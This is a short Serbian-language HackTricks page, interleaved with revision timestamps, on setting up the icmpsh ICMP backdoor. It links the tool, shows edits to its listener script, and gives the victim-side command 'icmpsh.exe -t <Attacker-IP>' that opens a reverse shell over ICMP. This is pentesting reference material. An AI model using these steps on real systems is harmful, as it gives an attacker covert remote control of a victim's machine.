2024-07-18 18:27:34 +00:00
{% hint style="success" %}
Učite i vežbajte hakovanje AWS-a: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks Obuka AWS Crveni Tim Stručnjak (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Učite i vežbajte hakovanje GCP-a: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks Obuka GCP Crveni Tim Stručnjak (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:39:21 +00:00
2024-07-18 18:27:34 +00:00
< details >
2024-04-06 19:39:21 +00:00
2024-07-18 18:27:34 +00:00
< summary > Pomozite HackTricks< / summary >
2024-04-06 19:39:21 +00:00
2024-07-18 18:27:34 +00:00
* Proverite [**planove pretplate** ](https://github.com/sponsors/carlospolop )!
* **Pridružite se** 💬 [**Discord grupi** ](https://discord.gg/hRep4RUj7f ) ili [**telegram grupi** ](https://t.me/peass ) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repozitorijume.
2024-04-06 19:39:21 +00:00
< / details >
2024-07-18 18:27:34 +00:00
{% endhint %}
2024-04-06 19:39:21 +00:00
Preuzmite backdoor sa: [https://github.com/inquisb/icmpsh ](https://github.com/inquisb/icmpsh )
# Klijentska strana
Izvršite skriptu: **run.sh**
**Ako dobijete neku grešku, pokušajte da promenite linije:**
```bash
IPINT=$(ifconfig | grep "eth" | cut -d " " -f 1 | head -1)
IP=$(ifconfig "$IPINT" |grep "inet addr:" |cut -d ":" -f 2 |awk '{ print $1 }')
```
**Za:**
```bash
echo Please insert the IP where you want to listen
read IP
```
# **Strana žrtve**
2024-04-07 04:23:52 +00:00
Postavite **icmpsh.exe** na žrtvu i izvršite:
2024-04-06 19:39:21 +00:00
```bash
icmpsh.exe -t < Attacker-IP > -d 500 -b 30 -s 128
```
2024-07-18 18:27:34 +00:00
{% hint style="success" %}
Učite i vežbajte AWS hakovanje: < img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > [**HackTricks obuka AWS Crveni Tim Ekspert (ARTE)**](https://training.hacktricks.xyz/courses/arte)< img src = "/.gitbook/assets/arte.png" alt = "" data-size = "line" > \
Učite i vežbajte GCP hakovanje: < img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > [**HackTricks obuka GCP Crveni Tim Ekspert (GRTE)**< img src = "/.gitbook/assets/grte.png" alt = "" data-size = "line" > ](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:39:21 +00:00
2024-07-18 18:27:34 +00:00
< details >
2024-04-06 19:39:21 +00:00
2024-07-18 18:27:34 +00:00
< summary > Podržite HackTricks< / summary >
2024-04-06 19:39:21 +00:00
2024-07-18 18:27:34 +00:00
* Proverite [**planove pretplate** ](https://github.com/sponsors/carlospolop )!
* **Pridružite se** 💬 [**Discord grupi** ](https://discord.gg/hRep4RUj7f ) ili [**telegram grupi** ](https://t.me/peass ) ili nas **pratite** na **Twitteru** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
* **Podelite hakovanje trikova slanjem PR-ova na** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) i [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repozitorijume.
2024-04-06 19:39:21 +00:00
< / details >
2024-07-18 18:27:34 +00:00
{% endhint %}